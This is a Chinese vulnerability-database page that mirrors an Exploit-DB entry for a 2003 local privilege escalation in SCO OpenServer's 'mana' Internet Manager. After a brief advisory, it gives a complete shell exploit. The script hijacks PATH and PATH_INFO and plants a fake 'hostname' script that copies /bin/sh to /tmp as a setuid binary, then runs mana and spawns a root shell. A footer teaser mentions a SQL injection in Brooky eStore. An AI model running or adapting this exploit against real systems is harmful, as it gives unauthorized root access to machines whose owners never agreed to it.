SCO OpenServer 5.0.x – ‘mana’ PATH_INFO Privilege Escalation

SCO OpenServer 5.0.x – ‘mana’ PATH_INFO Privilege Escalation

漏洞ID 1054165 漏洞类型
发布时间 2003-09-15 更新时间 2003-09-15
图片[1]-SCO OpenServer 5.0.x – ‘mana’ PATH_INFO Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-SCO OpenServer 5.0.x – ‘mana’ PATH_INFO Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 SCO CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23143
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8618/info

It has been reported that SCO OpenServer Inertnet Manager 'mana' process is prone to a privilege escalation issue allow local users to execute arbitrary code with elevated privileges. mana normally requires authentication, but this may be circumvented via exploitation of BID 8616. An attacker could exploit this issue by setting certain environment variables used by the program to cause an attacker-specified file to be executed with elevated privileges.

Successful exploitation of this issue would allow a remote attacker to execute arbitrary code as root.

#!/bin/sh
#
# OpenServer 5.0.7 - Local mana root shell
#
#

REMOTE_ADDR=127.0.0.1
PATH_INFO=/pass-err.mana
PATH=./:$PATH

export REMOTE_ADDR
export PATH_INFO
export PATH

echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname

chmod 755 hostname

/usr/internet/admin/mana/mana > /dev/null

/tmp/sh

相关推荐: Brooky eStore login.asp SQL注入漏洞

Brooky eStore login.asp SQL注入漏洞 漏洞ID 1202572 漏洞类型 SQL注入 发布时间 2003-08-18 更新时间 2003-08-18 CVE编号 CVE-2003-0585 CNNVD-ID CNNVD-200308-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享